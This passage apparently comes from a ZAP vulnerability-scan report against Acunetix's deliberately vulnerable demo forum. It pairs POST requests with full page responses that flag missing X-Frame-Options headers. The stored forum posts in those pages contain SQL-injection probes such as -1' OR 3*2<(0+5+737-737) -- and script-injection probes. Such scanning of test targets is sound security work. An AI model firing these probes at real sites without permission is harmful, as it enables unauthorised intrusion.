</table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=31 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:51 GMT Content-Length: 3142 |
Response Body - size: 3,142 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 2+737-737-1=0+0+0+1 -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 2+737-737-1=0+0+0+1 -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 2+737-737-1=0+0+0+1 -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=32 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:52 GMT Content-Length: 3190 |
Response Body - size: 3,190 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum "acxzzzzzzzzbbbccccdddeeexca".replace("z","o") </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/"acxzzzzzzzzbbbccccdddeeexca".replace("z","o") </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>"acxzzzzzzzzbbbccccdddeeexca".replace("z","o") - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=33 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:52 GMT Content-Length: 3142 |
Response Body - size: 3,142 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3+737-737-1=0+0+0+1 -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3+737-737-1=0+0+0+1 -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3+737-737-1=0+0+0+1 -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=34 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:52 GMT Content-Length: 3100 |
Response Body - size: 3,100 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>555'"()&%<acx><ScRiPt >V7NV(9847)</ScRiPt></div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=35 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:52 GMT Content-Length: 3136 |
Response Body - size: 3,136 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3*2<(0+5+737-737) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3*2<(0+5+737-737) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3*2<(0+5+737-737) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=36 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:52 GMT Content-Length: 3097 |
Response Body - size: 3,097 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>'"()&%<acx><ScRiPt >V7NV(9478)</ScRiPt></div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=37 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:52 GMT Content-Length: 3136 |
Response Body - size: 3,136 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1' OR 3*2>(0+5+737-737) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1' OR 3*2>(0+5+737-737) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1' OR 3*2>(0+5+737-737) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=38 |
Method | POST |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:53 GMT Content-Length: 3068 |
Response Body - size: 3,068 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:52 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>5559996333</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" 